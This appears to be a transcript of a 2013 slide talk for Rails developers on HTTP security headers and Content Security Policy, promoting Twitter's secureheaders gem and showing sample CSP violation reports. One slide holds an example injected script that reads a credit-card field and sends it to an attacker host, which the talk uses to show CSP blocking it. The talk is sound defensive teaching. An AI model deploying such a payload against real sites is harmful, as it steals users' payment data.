Security headers

Transcript

1. @ocrails | @ndm @ocrails January 30, 2013 Not your typical

   Rails security talk Header use @ Twitter B

2. @ocrails | @ndm What are headers?

3. @ocrails | @ndm Wait, not those ones

4. @ocrails | @ndm OK, but what are browser headers Authorization:

   Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ== Accept: text/plain Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0

5. @ocrails | @ndm Response headers Cache-Control: max-age=3600 ETag: "737060cd8c284d8af7ad3082f209582d" Location:

   http://www.w3.org/pub/WWW/People.html

6. @ocrails | @ndm I’m already bored Time to get awesomer

7. @ocrails | @ndm Security headers Leverage the browser for security

8. @ocrails | @ndm Sweeeeet. I don’t have write secure code!

9. @ocrails | @ndm Time of convergence

10. @ocrails | @ndm Should you?

11. @ocrails | @ndm Do you use these? Content security policy

    X-Frame-Options HTTP Strict Transport Security X-Xss-Protection X-Content-Type-Options

12. @ocrails | @ndm X-ContentType-Options Fixes mime sniffing attacks Only applies

    to IE, because only IE would do something like this X-Content-Type-Options = ‘nosniff’ zzzzZZZZZZzzzzz

13. @ocrails | @ndm X-Xss-Protection Use the browser’s built in XSS

    Auditor X-Xss-Protection: [0-1](; mode=block)? X-Xss-Protection: 1; mode=block (SCREENSHOT OF BLOCKED SCRIPT) zzzzZZZ... huh? zzzzzzzz

14. @ocrails | @ndm X-Frame-Options Protects you from most classes of

    Clickjacking X-Frame-Options: DENY X-Frame-Options: SAMEORIGIN X-Frame-Options: ALLOW FROM example.com zzz... oh hey thats cool. Don’t frame my stuff.

15. @owaspoc Jan 2013 @ndm | @presidentbeef X-Frame-Options

16. @ocrails | @ndm Firesheep/SSL Strip Given I don’t haven’t received

    an HSTS header And I have a session When I visit http://example.com Then I am pwned

17. @ocrails | @ndm Other ssl fails Posting passwords over HTTP

    Loading mixed content Using protocol relative URLS

18. @ocrails | @ndm Strict Transport Security

19. @ocrails | @ndm How hard is it to use? Base

    Case Strict-transport-security: max-age=10000000 Do all of your subdomains support SSL? Strict-transport-security: max-age=10000000; includeSubdomains (SSL FOR DUMMIES PICTURE)

20. @ocrails | @ndm Content secur-a-wat? Content security policy is reshaping

    the security model It is a complicated spec with great differences across browsers It is not widely adopted However, It completely eliminates reflected and stored XSS It ensures that you never load mixed content It can protect users with infected browsers It allows you to accept arbitrary html code from users

21. @ocrails | @ndm Wat? Sounds cool. x-webkit-csp: script-src style-src img-src

    default-src frame-src connect-src font-src media-src object-src report-uri

22. @owaspoc Jan 2013 @ndm |

23. @ocrails | @ndm Get rid of XSS, eh? A script-src

    directive that doesn’t contain ‘unsafe-inline’ almost eliminates most forms of cross site scripting. I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT I WILL NOT WRITE INLINE JAVASCRIPT

24. @owaspoc Jan 2013 @ndm |

25. @owaspoc Jan 2013 @ndm | @presidentbeef But I have to...

    OK, then I’ll inject: <script> var image = new Image(); image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val(); </script> FALSE! img-src violation, no XHR allowed

26. @ocrails | @ndm Inline css too? WTF?

27. @ocrails | @ndm Choose your own adventure

28. @ocrails | @ndm Apply all the headers!

29. @ocrails | @ndm How to apply? Secure headers! Open sourced

    earlier this month https://github.com/twitter/secureheaders

30. @ocrails | @ndm How does it work? It sets a

    before_filter that applies each header Values are based on options passed to filter, or in an initializer Easily overridden Secure by default!!!

31. @ocrails | @ndm What about that security policy thingy There

    are > 6 differences between these two header values

32. @ocrails | @ndm Yay for standards

33. @ocrails | @ndm Long hair don’t care About browser inconsistencies

34. @ocrails | @ndm Other features Set separate policies for http/https

    Autofill chrome-extension: (becoming part of spec) Auto fill missing directives with default value (becoming part of the spec)

35. @ocrails | @ndm You mean there’s more on CSP? The

    browser sends reports!

36. @ocrails | @ndm What does the report look like? {

    "csp-report"=> { "document-uri"=>"http://localhost:3000/home", "referrer"=>"", "blocked-uri"=>"ws://localhost:35729/livereload", "violated-directive"=>"xhr-src ws://localhost.twitter.com:*" } }

37. @ocrails | @ndm Quiz: what does this report indicate? {

    "csp-report"=> { "document-uri"=>"http://example.com/welcome", "referrer"=>"", "blocked-uri"=>"self", "violated-directive"=>"inline script base restriction", "source-file"=>"http://example.com/welcome", "script-sample"=>"alert(1)", "line-number"=>81 } }

38. @ocrails | @ndm Header gem to the rescue It forwards

    CSP reports for Firefox It makes setting an enforce and report only mode easy for experimentation

39. @ocrails | @ndm Monitor and Tune ALL the things

40. @ocrails | @ndm Splunk

41. @ocrails | @ndm Trending and anomalies

42. @owaspoc Jan 2013 @ndm | @presidentbeef CSP Brakeman ThreatDeck Phantom

    Gang Roshambo Email developer s Email security

43. @ocrails | @ndm Who wants to buy me a beer?